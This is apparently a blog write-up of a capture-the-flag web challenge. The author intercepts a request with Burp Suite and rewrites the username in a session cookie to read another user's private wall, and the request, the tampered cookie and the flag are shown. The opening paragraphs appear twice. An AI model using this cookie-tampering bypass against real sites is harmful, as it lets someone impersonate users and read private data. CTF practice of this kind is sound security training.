Challenge 19 was the first that I began to work on.
This challenge was worth the largest of the challenges and thought it would be a good starting point.
The game play was strait forward that the flag was on Fl4gdud3's wall. For this I chose to use Burpesuite for this while I was looking around. Once logged in you can see that you have friends that you can see like twitter. As you click around you will see the "admin" is following and the others that are following admin which happens to be "flagdud3" . This was the first piece to the puzzle now that you know the real name that you are looking for not the dude with the 4 in his name.
Upon trying to browse to "flagdud3's" page you get an:
Now you know that you need to find a way to get to this wall as a different user. Lets turn to burpe and look at the request.
So if you send this request to repeater and alter the request to be "flagdud3" and looks like:
you will get the response that you are looking for:
And there you have it 500 points
19 - Fishr - Fish your messages out of the sea
Please log in to Fishr using the name 0wn and the password pwnthis.
The flag is on fl4gdud3's wall, get it.
gold: 500 +3 (1st), +2 (2nd), +1 (3rd)
This challenge was worth the largest of the challenges and thought it would be a good starting point.
The game play was strait forward that the flag was on Fl4gdud3's wall. For this I chose to use Burpesuite for this while I was looking around. Once logged in you can see that you have friends that you can see like twitter. As you click around you will see the "admin" is following and the others that are following admin which happens to be "flagdud3" . This was the first piece to the puzzle now that you know the real name that you are looking for not the dude with the 4 in his name.
Upon trying to browse to "flagdud3's" page you get an:
Sorry, but there are no visible Posts. This user might have set his wall to private and you lack the permission to read private wall messages.
Now you know that you need to find a way to get to this wall as a different user. Lets turn to burpe and look at the request.
GET /ajax.php?p=wall&arg=flagdud3 HTTP/1.1The cookie is the key and you can see that your username is in it.
Host: challenge19.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: https://challenge19.mozillactf.org/index.php
Cookie: data=7%3A0wn%3A0wn%2540spam.com; mac=eccc50cafdb69aac25dba7738651ddff
DNT: 1
Connection: keep-alive
7%3A0wn%3A0wn%2540spam.com;
So if you send this request to repeater and alter the request to be "flagdud3" and looks like:
7%3Aflagdud3%3Aflagdud3%2540spam.com;
you will get the response that you are looking for:
Kickin' in the front seat - sittin' in the back seat...
<span class="time">- posted at 27.12.2011 16:32</span>
</div>
<div class="post">
<b>flagdud3:</b>
Flag: s0ci4lly4wkw4rd
<span class="time">- posted at 26.12.2011 12:46</span>
And there you have it 500 points
No comments:
Post a Comment